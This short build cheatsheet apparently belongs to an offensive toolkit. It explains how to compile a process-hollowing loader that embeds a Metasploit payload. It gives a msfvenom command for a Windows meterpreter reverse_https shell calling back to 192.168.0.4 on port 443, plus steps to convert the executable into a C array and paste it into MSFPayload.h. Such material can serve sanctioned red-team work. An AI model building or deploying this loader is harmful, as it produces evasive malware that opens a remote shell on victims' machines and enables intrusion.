#
Step6
In
#
Hollow Build Instructions - Visual Studio
- Create new visual studio project.
- Add MSFPayload.h and ProcessHollowing.c
- Update the payload within MSFPayload.h appropriately
#
MSFPayload Build Cheatsheet
- Generate MSF payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=443 -f exe -o msf.exe
- Create C array.
xxd -i msf.exe
Copy and paste msfpayload in MSFPayload.h
Update variable names as appropriate.